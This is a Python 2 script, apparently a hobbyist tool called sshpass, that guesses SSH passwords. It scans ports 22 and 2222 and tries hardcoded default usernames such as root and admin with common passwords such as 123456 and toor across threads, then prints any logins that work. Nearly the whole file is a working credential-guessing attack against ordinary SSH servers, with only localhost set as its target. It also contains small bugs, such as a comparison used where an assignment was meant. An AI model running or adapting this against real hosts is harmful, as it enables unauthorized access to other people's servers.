################################################################################

1. ###################################################################################
2. #
3. # sshpass v1.01
4. #
5. # simple application for guessing ssh protocol passwords. focuses less on brute
6. # forcing which is tedious and boring (and not that effective these days), and more
7. # on trying common passwords. it was more a chance for me to do some threading in
8. # python... If you give it a big wordlist be prepared to wait a while.
9. #
10. # caution! this is a really good way to get blocked by firewalls or fired from work
11. #
12. # changelog:
13. # 05/05/2016 - now with threading and queues :D
14. #
15. ###################################################################################
16.  
17. import paramiko, sys, os, socket
18. from threading import Thread
19. from Queue import Queue, Empty
20.  
21. class Password:
22. '''create password objects to store on the queue accessed by each thread'''
23. def __init__(self, host, port, username, password):
24. self.host = host
25. self.port = port
26. self.username = username
27. self.password = password
28.  
29. def __str__(self):
30. return self.host + ':' + self.port + ':' + self.username + ':' + self.password
31.  
32. def ssh_connect(host, port, username, password, code=0):
33. '''function performs ssh interaction'''
34. ssh = paramiko.SSHClient()
35. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
36.  
37. try:
38. ssh.connect(host, port=int(port), username=username, password=password)
39. except paramiko.AuthenticationException:
40. code = 1 # auth fail
41. except socket.error:
42. code = 2 # connection fail
43.  
44. ssh.close()
45. return code
46.  
47.  
48. def iterate(h, i, q):
49. '''function runs through all the hosts we gave the app.
50. the funky break statements are for performance, so the loops die
51. if the password is found...'''
52.  
53. ports = ['22', '2222']
54. usernames = ['root', 'admin', 'oracle', 'test', 'user', 'ssh']
55. passwords = ['1234', '12345', '123456', 'Password', 'Password1',
56. 'password', 'password1', 'password123', 'root', 'toor', 'ssh']
57. found = False
58.  
59. for port in ports:
60. # check if the port we want to try is open first...
61. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
62. result = sock.connect_ex((h, int(port)))
63. if result == 0: # port is open!
64. for u in usernames:
65. for p in passwords:
66. if ssh_connect(h, port, u, p) == 0:
67. print '[*] ' + str(Password(h, port, u, p))
68. q.put(Password(h, port, u, p))
69. found == True
70. break
71. else:
72. continue
73. break
74. else:
75. continue
76. break
77. print '[i] Host finished: ' + h + ' (stopping thread: ' + str(i) + ')'
78.  
79.  
80. i=0
81. q = Queue()
82. threads = []
83. hosts = ['127.0.0.1']
84.  
85. for h in hosts:
86. i += 1
87. t = Thread(target=iterate, args=(h, i, q))
88. threads.append(t)
89.  
90. for thread in threads:
91. print '[i] Testing host: ' + h + ' (thread: ' + str(i) + ')'
92. thread.start()
93.  
94. for thread in threads:
95. print '[i] (waiting for thread ' + str(i) + ' to finish)'
96. thread.join()
97.  
98. try:
99. print '\n[*] Passwords recovered:'
100. for elem in list(q.queue):
101. print '\t' + str(elem)
102. except Empty:
103. print '[*] No passwords recovered :('